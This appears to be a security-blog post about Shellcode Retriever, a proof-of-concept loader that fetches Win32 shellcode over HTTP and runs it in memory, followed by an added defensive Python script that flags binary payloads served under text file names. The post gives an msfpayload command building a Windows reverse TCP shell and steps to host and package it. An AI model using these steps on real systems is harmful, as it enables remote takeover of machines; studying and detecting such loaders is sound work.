Never Ending Security


Shellcode Retriever – POC of code that downloads and executes shellcode in memory.


Shellcode Retriever

Downloads Win32 shellcode from a web server and executes it in memory, without the shellcode ever touching disk (using the method described at http://www.debasish.in/2012_04_01_archive.html).

Demo:

http://www.youtube.com/watch?v=R15B2p-uWKY


For use by IT Security professionals and researchers.

Usage:

Create shellcode using the following msfpayload command:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt

Note the exit function (EXITFUNC=thread): it is very important if you want the process to keep running and beacon out based on the timeouts in the source code.

Upload the shellcode to your webserver.

Compile the Python code to an executable using PyInstaller.

More info can be found on: https://github.com/secretsquirrel/shellcode_retriever
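
From the defender's side, the delivery described above leaves a trace at a web proxy: a raw payload served under a text extension (test.txt in the usage above). The Python below is an added example, not code from the original post or the shellcode_retriever project; the event tuple format, thresholds, function names and sample data are assumptions, and repeated fetching at a fixed interval is assumed here rather than stated on the page.

```python
import statistics

TEXT_EXTS = (".txt", ".htm", ".html", ".css", ".js")

def looks_binary(body, threshold=0.30):
    """True when a response body is not plausible text (heuristic)."""
    if not body:
        return False
    if b"\x00" in body:          # NUL bytes do not occur in ordinary text
        return True
    odd = sum(1 for b in body if not (32 <= b < 127 or b in (9, 10, 13)))
    return odd / len(body) > threshold

def is_periodic(timestamps, min_hits=4, max_jitter=0.10):
    """True when fetches are evenly spaced (low relative spread of gaps)."""
    if len(timestamps) < min_hits:
        return False
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter

def flag_fetches(events):
    """events: (epoch_seconds, client_ip, url, body_bytes) tuples.
    Returns (client, url, hit_count, periodic) for every text-named URL
    whose body is binary, so a single fetch is reported as well."""
    hits = {}
    for ts, client, url, body in events:
        path = url.split("?", 1)[0].lower()
        if path.endswith(TEXT_EXTS) and looks_binary(body):
            hits.setdefault((client, url), []).append(ts)
    return sorted((c, u, len(t), is_periodic(t)) for (c, u), t in hits.items())

# Constructed sample data: placeholder bytes, not real shellcode.
BINARY = bytes(range(256))
TEXT = b"User-agent: *\nDisallow: /private\n"
SAMPLE = [
    (1000, "10.0.0.5", "http://files.example/test.txt", BINARY),
    (1060, "10.0.0.5", "http://files.example/test.txt", BINARY),
    (1120, "10.0.0.5", "http://files.example/test.txt", BINARY),
    (1181, "10.0.0.5", "http://files.example/test.txt", BINARY),
    (1005, "10.0.0.9", "http://files.example/robots.txt", TEXT),
    (1500, "10.0.0.7", "http://files.example/notes.txt?v=2", BINARY),
]

if __name__ == "__main__":
    for row in flag_fetches(SAMPLE):
        print(row)
```

The byte-ratio check is a heuristic: legitimate non-ASCII text can exceed the threshold, so treat a hit as a lead to correlate with the requesting process rather than a verdict.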